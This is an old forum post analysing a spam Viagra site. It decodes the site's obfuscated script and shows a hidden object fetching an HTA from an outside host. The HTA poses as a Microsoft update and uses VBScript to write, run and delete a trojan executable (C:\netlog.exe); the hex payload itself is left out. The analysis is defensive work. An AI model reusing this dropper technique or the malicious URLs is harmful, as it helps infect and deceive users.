VoyForums
[ Show ]
Support VoyForums
[ Shrink ]
VoyForums Announcement: Programming and providing support for this service has been a labor of love since 1997. We are one of the few services online who values our users' privacy, and have never sold your information. We have even fought hard to defend your privacy in legal cases; however, we've done it with almost no financial support -- paying out of pocket to continue providing the service. Due to the issues imposed on us by advertisers, we also stopped hosting most ads on the forums many years ago. We hope you appreciate our efforts.

Show your support by donating any amount. (Note: We are still technically a for-profit company, so your contribution is not tax-deductible.) PayPal Acct: Feedback:

Donate to VoyForums (PayPal):

Login ] [ Contact Forum Admin ] [ Main index ] [ Post a new message ] [ Search | Check update time | Archives: 123456789[10] ]


[ Next Thread | Previous Thread | Next Message | Previous Message ]

Date Posted: 23:12:32 11/03/03 Mon
Author: Scammer
Subject: Viagra or Trojan?

Viagra or Trojan? [well, if you get Viagra, I guess you would
be using Trojans ...]

Spamvertized URL: <a rel=nofollow target=_blank href="http://alldolly.net/discounts/?pid=evaph3770">http://alldolly.net/discounts/?pid=evaph3770</a>

(NANAS posting:
Subject: [email] V1@GRA --> 80% D1SC0UNT!! jjxcxuiz lqihjgkuf)

The site appears to be a Viagra site but the ordering is down now.
Was it ever up or is the site a fake Viagra site used to install
a trojan?


------------------------------------------------------------
There is a header section on the spamvertized page which is
mildly encrypted (decimal ascii values for the characters)
which defines two functions:
DecodeHead() (which is immediately run) and
DecodeB() (run at the end of the page)

What do we get?

[object data="<a rel=nofollow target=_blank href="http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"">http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"</a>
style="display:none"][/object]

What is "<a rel=nofollow target=_blank href="http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"?">http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"?</a>

Content-Type: application/hta

[TITLE]Microsoft Update Wizard[/TITLE]
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE

[OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"][/OBJECT]
[OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"][/OBJECT]
[BODY][SCRIPT language="VBScript"]

self.MoveTo 6000,6000

[Then 61 lines of hex encoded data.]

FileName="C:\netlog.exe"
set IESetup=MSmedia.CreateTextFile(FileName, TRUE)
[write the bytes of the code to the file:
IESetup.Write(Chr(Exe_Byte))]
MSplay.Run (FileName),1,TRUE
MSmedia.DeleteFile(FileName)
------------------------------------------------------------

[ Next Thread | Previous Thread | Next Message | Previous Message ]

Login ] Create Account Not required to post.
Post a public reply to this message | Go post a new public message
* HTML allowed in marked fields.
Message subject (required):

Name (required):

  Expression (Optional mood/title along with your name) Examples: (happy, sad, The Joyful, etc.) help)

  E-mail address (optional):

Type your message here:


Notice: Copies of your message may remain on this and other systems on internet. Please be respectful.

[ Contact Forum Admin ]


Forum timezone: GMT-8
VF Version: 3.00b, ConfDB:
Before posting please read our privacy policy.
VoyForums(tm) is a Free Service from Voyager Info-Systems.
Copyright © 1998-2019 Voyager Info-Systems. All Rights Reserved.